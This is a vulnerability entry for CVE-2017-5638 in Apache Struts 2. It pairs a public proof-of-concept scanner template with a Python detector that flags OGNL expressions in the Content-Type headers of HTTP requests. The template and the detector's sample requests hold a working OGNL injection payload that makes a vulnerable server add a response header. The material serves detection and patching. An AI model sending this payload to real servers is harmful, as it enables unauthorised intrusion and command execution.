Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
PoC code [public]
id: CVE-2017-5638
info:
  name: Apache Struts 2 - Remote Command Execution S2-045 S2-046
  author: Random_Robbie
  severity: critical
  description: Apache Struts 2 2.3.x before 2.3.32 and 2.5.x before 2.5.10.1 is vulnerable to remote command injection attacks through incorrectly parsing an attacker's invalid Content-Type HTTP header. The Struts vulnerability allows these commands to be executed under the privileges of the Web server.
  reference:
    - https://github.com/mazen160/struts-pwn
    - https://nvd.nist.gov/vuln/detail/CVE-2017-5638
    - https://isc.sans.edu/diary/22169
    - https://github.com/rapid7/metasploit-framework/issues/8064
rules:
  r0:
    request:
      method: GET
      path: /
      headers:
        Content-Type: "%{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz Test')}.multipart/form-data"
    expression: 'response.raw_header.bcontains(b"X-Hacker: Bounty Plz Test")'
expression: r0()
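
A defender-side counterpart to the template above, added here as an example and not part of the original template or of Struts: it classifies the Content-Type of raw HTTP requests, flagging OGNL expression markers and values that are not a valid media type. The function names, the `app.example` host and the sample requests are constructed for illustration.

```python
import re

# "%{" and "${" open an OGNL expression; neither is legal in a media type.
OGNL_MARKER = re.compile(r"[%$]\{")
TOKEN = r"[!#$%&'*+.^_`|~0-9A-Za-z-]+"  # RFC 7230 token characters
MEDIA_TYPE = re.compile(rf'^{TOKEN}/{TOKEN}(?:\s*;\s*{TOKEN}=(?:{TOKEN}|"[^"]*"))*\s*$')

def classify_content_type(value):
    """Return 'ognl', 'malformed' or 'ok' for one Content-Type value."""
    if OGNL_MARKER.search(value):
        return "ognl"
    if not MEDIA_TYPE.match(value.strip()):
        return "malformed"
    return "ok"

def content_type_of(raw_request):
    """Extract the Content-Type value from a raw HTTP request head, or None."""
    head = raw_request.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "content-type":
            return value.strip()
    return None

def scan(requests):
    """Map each request's index to its verdict; requests without the header are skipped."""
    verdicts = {}
    for i, raw in enumerate(requests):
        ct = content_type_of(raw)
        if ct is not None:
            verdicts[i] = classify_content_type(ct)
    return verdicts

# Constructed sample requests (not captured traffic); the second reuses the
# header value from the template above.
SAMPLES = [
    "POST /upload.action HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: multipart/form-data; boundary=----abc123\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: app.example\r\n"
    "Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse']"
    ".addHeader('X-Hacker','Bounty Plz Test')}.multipart/form-data\r\n\r\n",
    "GET / HTTP/1.1\r\nHost: app.example\r\ncontent-type: not a media type\r\n\r\n",
    "GET /index.action HTTP/1.1\r\nHost: app.example\r\n\r\n",
]

if __name__ == "__main__":
    for index, verdict in scan(SAMPLES).items():
        print(index, verdict)
```

A verdict of `ognl` or `malformed` is a signal to block or alert on at the proxy or WAF layer; the fix itself is upgrading to 2.3.32 or 2.5.10.1.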